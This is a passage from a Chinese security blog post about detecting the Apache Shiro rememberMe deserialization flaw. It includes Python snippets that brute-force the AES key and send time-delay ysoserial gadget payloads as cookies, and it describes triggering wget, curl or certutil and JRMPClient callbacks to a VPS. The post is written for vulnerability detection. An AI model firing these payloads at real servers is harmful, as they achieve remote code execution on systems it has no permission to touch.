&#39;Set-Cookie&#39; not in response.headers.keys():</span><br><span class="line">            shiro_key_right &#x3D; shiro_key</span><br><span class="line">            print &quot;存在Shiro反序列化漏洞&quot;</span><br><span class="line">            print &quot;key found: &quot; + shiro_key</span><br><span class="line">            break</span><br><span class="line">    except:</span><br><span class="line">        pass</span><br></pre></td></tr></table></figure>

<h3 id="可用的gadget"><a href="#可用的gadget" class="headerlink" title="可用的gadget"></a>可用的gadget</h3><p>确定AES加密的密钥后，后面就是进一步确定可用的gadget。对于gadget的检测，我们需要把目标环境是否可以出外网纳入需要考虑的因素。对应的可以把 ysoserial 中的gadget分为两类：需要出外网的和不需要出外网的。通常情况下需要出外网的如：URLDNS、JRMPClient、C3P0等，不需要出外网可直接执行命令的如CommonBeanutils1、CommonsCollections1-7、Jdk7u21等（当然这些也可以通过执行ping、wget等命令发起网络请求）。</p>
<p>对于可以出网的环境的检测是最简单的，所以在gadget检测时可以先尝试URLDNS判断目标环境是否可以出网，因为URLDNS不依赖于任何的第三方库，但是使用URLDNS检测后DNSLOG平台存在DNS记录并不完全等同于可以出外网，还有可能是目标只支持DNS解析，但是TCP协议等是不能出外网的。其次，可以通过CommonBeanutils1等其他gadget执行wget或者curl命令，这里需要考虑操作系统情况，Windows则是certutil等命令。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/5.png" alt=""></p>
<p>也可以实现通过构造回显的方法进行漏洞检测，但是实现回显需要考虑不同中间件及版本等问题，还是不够通用，很容易造成漏报。那么有没有更通用的漏洞检测方法呢，答案肯定是有的。我们可以使用时间延迟的方法来判断哪个gadget可用。借用时间延迟检测我们不需要考虑目标是否可以出网，也不需要考虑操作系统等问题。</p>
<p>如果需要实现时间延迟检测，需要先对ysoserial进行简单修改，加入时间延迟的payload。修改ysoserial里面的payload可以分为两种情况，一种是使用了createTemplatesImplTime链的，如CommonsBeanutils1，直接在Gadgets类中新增createTemplatesImplTime方法。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/6.png" alt=""><br>然后新建一个CommonsBeanutils1_Time类，将原来的CommonsBeanutils1代码中的createTemplatesTmpl修改为createTemplatesImplTime方法。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/7.png" alt=""></p>
<p>对于不使用createTemplatesImplTime链的，则需要另外单独一个个修改了，如CommonsCollections1。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/8.png" alt=""></p>
<p>请求延迟10秒测试：<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/9.png" alt=""></p>
<p>为了降低网络不稳定带来的误报，在如何判断是否产生时间延迟上，我借鉴了sqlmap时间盲注的思路。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/10.png" alt=""></p>
<p>大体检测流程如下：<br>• 执行30次原始请求，记录响应时间<br>• 计算30次请求响应时间的标准差及平均差<br>• 根据标准差和时间差计算最慢响应时间<br>• 如果响应时间比最难响应时间要大则可以判断为产生了时间延迟，否则没有产生时间延迟<br>• 执行三次请求减少误报，第一次请求提交为延迟5秒的payload，第二次请求为延迟0秒的payload，第三次请求为延迟5秒的payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">lowerStdLimit &#x3D; average(responseTimes) + 7 * stdev(responseTimes)</span><br><span class="line">MIN_VALID_DELAYED_RESPONSE &#x3D; 0.5</span><br><span class="line"></span><br><span class="line">for payload in payloads: #时间延迟检测，三次检测，减少误报</span><br><span class="line">    rememberMe_value1 &#x3D; time_sleep_poc(shiro_key, payload, 5000)</span><br><span class="line">    rememberMe_value2 &#x3D; time_sleep_poc(shiro_key, payload, 0)</span><br><span class="line">    try:</span><br><span class="line">        time1 &#x3D; resp_time(target, rememberMe_value1)</span><br><span class="line">        if time1 and time1 &gt;&#x3D; max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit):</span><br><span class="line">            time2 &#x3D; resp_time(target, rememberMe_value2)</span><br><span class="line">            if time2 and time2 &lt; max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit):</span><br><span class="line">                time3 &#x3D; resp_time(target, rememberMe_value1)</span><br><span class="line">                if time3 and time3 &gt;&#x3D; max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit):</span><br><span class="line">                    print &quot;payload found: &quot; + payload</span><br><span class="line">                    print &quot;Cookie: &quot; + &quot;rememberMe&#x3D;&quot; + rememberMe_value1</span><br><span class="line">                    print &quot;*&quot; * 100</span><br><span class="line"></span><br><span class="line">    except Exception as e:</span><br><span class="line">        print e</span><br></pre></td></tr></table></figure>

<p>理论上，使用前面的检测方法应该能覆盖到大部分的场景了，但是其实还需要考虑一种情况。在Shiro反序列化漏洞中直接使用CommonCollections3、5、6、7链时会出现无法加载数组类问题，需要借助JRMPClient。同时在前面URLDNS的检测中也提到过检测目标环境是否通外网的问题，URLDNS只能证明支持DNS解析，在目标环境没有使用高版本JDK限制JNDI注入且可以出网的情况下，我们可以使用JRMPClient判断目标是否可以出外网，同时也可以解决CommonCollections链的坑。因此在检测中考虑也把JRMPClient加上。加入JRMPClient后在想怎样获取这个payload是否成功向VPS发起了连接。一开始想的是用java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient ‘xxx.dnslog.cn’这样子的方式去触发DNS查询，然后再去DNSLOG平台取结果，但是这种方式会遗漏目标不支持DNS解析，但是可以出外网的情况。后来想到了一种“投机取巧”的方法，可以直接修改ysoserial，使得JRMPClient向VPS的JRMPClient发起连接时，让VPS去向DNSLOG发起请求，然后再去DNSLOG平台取结果就可以了。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/11.png" alt=""></p>
<p><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/12.png" alt=""></p>
<p>至此，一个还算比较靠谱的Shiro反序列化漏洞检测脚本就完成了。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-2/13.png" alt=""></p>
<h2 id="0x4-总结"><a href="#0x4-总结" class="headerlink" title="0x4 总结"></a>0x4 总结</h2><p>简单总结一下，在漏洞检测中需要达成的重要目标无非就是较高的漏洞检出率和较低的误报率。而需要达成这两个目标的过程就要尽可能的想到各种可能的情况。要实现较高的漏洞检出率，在检测过程中我们需要确保检测的POC尽可能通用，如不受操作系统影响，不受目标是否可否可通外网影响等，另外通过先对Shiro AES加密的密钥先进行检测减少了很大的不确定性，极大的提高了漏洞检测的准确率。在误报率方面，比如在进行时间延迟检测时采用三次发包减少因网络延迟等原因造成的误报，以及在使用DNSLOG时可以引入随机或者重复率低的特定字符串来进行检测。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1-前言"><span class="toc-number">1.</span> <span class="toc-text">0x1 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-Shiro的识别"><span class="toc-number">2.</span> <span class="toc-text">0x2 Shiro的识别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3-漏洞检测"><span class="toc-number">3.</span> <span class="toc-text">0x3 漏洞检测</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#AES加密的密钥"><span class="toc-number">3.1.</span> <span class="toc-text">AES加密的密钥</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#可用的gadget"><span class="toc-number">3.2.</span> <span class="toc-text">可用的gadget</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x4-总结"><span class="toc-number">4.</span> <span class="toc-text">0x4 总结</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&text=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&is_video=false&description=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Shiro反序列化漏洞笔记二（检测篇）&body=Check out this article: http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&name=Shiro反序列化漏洞笔记二（检测篇）&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://changxia3.com/2020/09/05/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%8C%EF%BC%88%E6%A3%80%E6%B5%8B%E7%AF%87%EF%BC%89/&t=Shiro反序列化漏洞笔记二（检测篇）" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2022
    长夏
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

    <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?936248784480d2f187d6238c37fd9b20";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>

<!-- Disqus Comments -->


</body>
</html>
